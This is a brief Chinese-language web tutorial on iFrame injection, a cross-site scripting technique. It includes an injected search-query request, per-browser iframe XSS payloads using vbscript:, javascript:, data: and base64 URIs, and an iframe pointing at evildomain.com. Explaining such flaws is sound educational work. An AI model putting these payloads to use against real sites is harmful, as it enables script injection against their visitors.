如何解析iFrame注入時的利用

發(fā)布時間：2021-12-10 15:32:41 來源：億速云閱讀：158 作者：柒染欄目：大數(shù)據(jù)

本篇文章為大家展示了如何解析iFrame注入時的利用，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細(xì)介紹希望你能有所收獲。

iFrame注入是一種非常常見的跨站腳本攻擊。它包括已插入到網(wǎng)頁或文章內(nèi)容的一個或多個iframe代碼，或一般下載一個可執(zhí)行程序或進(jìn)行其他動作使網(wǎng)站訪客的電腦妥協(xié)。在最好的情況下，谷歌可能會標(biāo)注該網(wǎng)站“惡意”。最糟糕的情況是，站點(diǎn)所有者和訪問者最終使用了受惡意軟件感染的計算機(jī)。

iFrame注入發(fā)生在當(dāng)一個脆弱的網(wǎng)頁上的iFrame通過一個用戶可控輸入顯示另一個網(wǎng)頁。

GET/search.jsp?query=%3Ciframe%20src=%22https://google.com/?%22%3E%3C/iframe%3E HTTP/1.1

如何解析iFrame注入時的利用

不同瀏覽器使用不同payload：

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

如何解析iFrame注入時的利用

多種利用方式如下：

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  <iframe src="javascript:alert(1)"></iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

接受用戶提供的數(shù)據(jù)作為iframe源URL可能會導(dǎo)致在Visualforce頁面中加載惡意內(nèi)容。

發(fā)生iFrame欺騙漏洞在以下情況：

1、數(shù)據(jù)通過不可信的源進(jìn)入web應(yīng)用程序。

2、數(shù)據(jù)作為iframe URL使用，而不進(jìn)行驗(yàn)證。

通過這種方式，如果攻擊者向受害者提供設(shè)置為惡意網(wǎng)站的iframesrc參數(shù)，則該框架將與惡意網(wǎng)站的內(nèi)容一起呈現(xiàn)。

<iframe src="http://evildomain.com/">

上述內(nèi)容就是如何解析iFrame注入時的利用，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

如何解析iFrame注入時的利用

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽